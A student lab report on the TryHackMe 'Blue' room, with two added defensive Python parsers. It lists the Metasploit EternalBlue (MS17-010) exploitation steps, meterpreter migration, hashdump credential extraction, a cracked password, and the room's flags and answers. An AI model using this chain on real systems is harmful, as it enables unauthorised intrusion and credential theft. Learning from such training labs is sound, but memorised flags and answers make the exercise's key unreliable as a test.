
System Hacking

hashing

Uploaded by

SRINATH.S

CHAPTER TITLE: System Hacking

TOPIC: System Hacking ASSIGNMENT: 12

DATE: 14-06-2024 MARKS: 100

NAME: SRINATH S COLLEGE: KCE

System Hacking

1. Tasks:

Hack the Blue machine using Metasploit framework and submit a detailed
report here.

Blue
Deploy & hack into a Windows machine, leveraging common misconfiguration issues.

>>the task is to hack the Blue machine room on TryHackMe

>>first we need to join the room

>>then start the machine

>>start the attack box

>>starting the machine gives us the target IP address

>>we use the nmap tool to solve the problem

>>there are five tasks that we need to complete in this process

>>Recon >> Gain Access >> Escalate >> Cracking >> Final Flag


>>start the machine -> "your machine is initializing"

>>Scan and learn what exploit this machine is vulnerable to. Please note that this machine does
not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to
be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals
will likely get very little out of this room beyond basic practice as the process here is meant to
be beginner-focused.

>>the Target Machine Information panel displays the IP address


>>the displayed IP address is 10.10.193.240

>>open the nmap tool

>>run the nmap scan

>>using the command nmap -sSV 10.10.193.240

>>enter nmap -sC -sV 10


>> Scan the machine. (If you are unsure how to tackle this, I recommend checking out the
Nmap room)

>> How many ports are open with a port number under 1000?
>>after the nmap scan finishes it shows the port numbers; from these we need to count how many
ports are below 1000

>>in our report, after the nmap scan we get 3 ports which are under 1000

>>What is this machine vulnerable to? ms17-010
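
The port-count step above, as an added example that is not part of the original report: a small parser over nmap's normal output that counts open ports below 1000 and flags exposed SMB ports, the service MS17-010 affects. The sample output is constructed for illustration and the function names are hypothetical.

```python
import re

# Constructed sample of nmap normal output (illustrative, not the report's scan).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.193.240
PORT      STATE  SERVICE       VERSION
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds
3389/tcp  open   ms-wbt-server
8080/tcp  closed http-proxy
49152/tcp open   msrpc         Microsoft Windows RPC
"""

# One port-table row: "<port>/<proto> <state> <service> [version text]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SMB_PORTS = {139, 445}  # NetBIOS session service and direct-hosted SMB


def parse_ports(text):
    """Return one dict per row of the nmap port table; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            rows.append({"port": int(m.group(1)), "proto": m.group(2),
                         "state": m.group(3), "service": m.group(4),
                         "version": m.group(5).strip()})
    return rows


def open_below(rows, limit=1000):
    """Port numbers that are open and numerically below the limit."""
    return sorted(r["port"] for r in rows
                  if r["state"] == "open" and r["port"] < limit)


def smb_exposed(rows):
    """Open SMB ports; each one is a reason to confirm the MS17-010 patch,
    disable SMBv1 and restrict the port at the firewall."""
    return sorted(r["port"] for r in rows
                  if r["state"] == "open" and r["port"] in SMB_PORTS)


if __name__ == "__main__":
    rows = parse_ports(SAMPLE_NMAP)
    print("open ports below 1000:", open_below(rows))
    print("SMB exposed on:", smb_exposed(rows))
```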

>>Exploit the machine and gain a foothold.


>>Start Metasploit

>>enter msfconsole

>>search ms17-010

>>Find the exploitation code we will run against the machine. What is the full path of the code?

>>exploit/windows/smb/ms17_010_eternalblue
>>enter use 0

>>enter show targets to see the target list

>>set the target to 1, so enter set target 1

>>enter show options


>>set RHOST 10.10.193.240

>>set LHOST 10.10.77.166

>>An exploit executes a sequence of commands that target a specific vulnerability found in a
system or application to provide the attacker with access to the system.

>>enter exploit

>>search shell_to_meterpreter

>>enter use 0 and enter show options

>>set the session to 1, so enter the command set session 1


>>and enter run

>>after running against session 1, enter sessions -i 2

>>enter shell
>>after the process and channel are created, press Ctrl+Z -> y

>>enter the command ps to see the process list

>>process list
>>to migrate, enter the migrate command

>>enter hashdump to get the password hashes to crack the password

>>copy the data

>>we used the hashes website to get the password from the hash

>>enter submit

>>we have got the password

>>Show options and set the one required value. What is the name of this value?

>>the one required value is RHOSTS


>>Escalate

>>If you haven't already, background the previously gained shell (CTRL + Z). Research online how
to convert a shell to meterpreter shell in metasploit. What is the name of the post module we
will use?

>>post/multi/manage/shell_to_meterpreter

>>Select this (use MODULE_PATH). Show options, what option are we required to change?

>>SESSION

>>Set the required option, you may need to list all of the sessions to find your target here.

>>Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the
one you just wrote down in the previous step. This may take several attempts, migrating
processes is not very stable. If this fails, you may need to re-run the conversion process or
reboot the machine and start once again. If this happens, try a different process next time.

>>Cracking

>>by using hashdump we get the password hashes

>>Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of
the passwords on the machine as long as we have the correct privileges to do so. What is the
name of the non-default user?

>>Jon

>>the cracked data


>>Copy this password hash to a file and research how to crack it. What is the cracked password?
>>alqfna22

>>password successfully cracked
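
As an added example (not part of the original report or of the room), a defender can audit the same pwdump-style output that hashdump produces: the sketch below flags non-default accounts, blank passwords, stored LM hashes and NT hashes shared between accounts. The sample dump is constructed, the non-empty hash values are made up, and the function names are hypothetical.

```python
from collections import defaultdict

# LM and NT hashes of the empty string (well-known constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump format: user:RID:LM:NT:::
# The non-empty hashes are made-up values, not the hashes from the room.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
svc_backup:1001:0123456789abcdef0123456789abcdef:00112233445566778899aabbccddeeff:::
"""


def parse_dump(text):
    """Parse pwdump-format lines into account records; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def audit(accounts):
    """Return (user, finding) pairs for weaknesses visible in the dump itself."""
    findings = []
    by_nt = defaultdict(list)
    for a in accounts:
        if a["rid"] >= 1000:  # locally created accounts start at RID 1000
            findings.append((a["user"], "non-default account"))
        if a["nt"] == EMPTY_NT:
            findings.append((a["user"], "blank password"))
        else:
            by_nt[a["nt"]].append(a["user"])
        if a["lm"] != EMPTY_LM:  # legacy LM storage is still enabled
            findings.append((a["user"], "LM hash stored"))
    for users in by_nt.values():
        if len(users) > 1:  # unsalted NT hashes: same hash means same password
            findings.extend((u, "NT hash shared with another account") for u in users)
    return findings


if __name__ == "__main__":
    for user, finding in audit(parse_dump(SAMPLE_DUMP)):
        print(f"{user}: {finding}")
```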

>>enter the command shell

>>Ctrl+Z -> y
>>The pwd command writes to standard output the full path name of your current directory
(from the root directory)

>>enter pwd command

>>enter cd ..

>>Displays directory of files and directories stored on disk. In addition to files and directories,
DIR also displays both the volume name and amount of free storage space on the disk (if there
are files stored in the current directory).

>>enter dir
>>after entering the dir command it shows the list of names

>>first we have to look at flag1.txt


>>so enter cat flag1.txt

>>enter shell
>>enter the dir *flag* /s /b command

>>it will show the config path of flag2.txt

>>enter type C:\Windows\System32\config\flag2.txt

>>enter type C:\Users\Jon\Documents\flag3.txt


>>Flag1? This flag can be found at the system root.

>>flag{access_the_machine}
>>Flag2? This flag can be found at the location where passwords are stored within Windows.

>>flag{sam_database_elevated_access}

>>Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually
have pretty interesting things saved.

>>flag{admin_documents_can_be_valuable}

>>room is completed
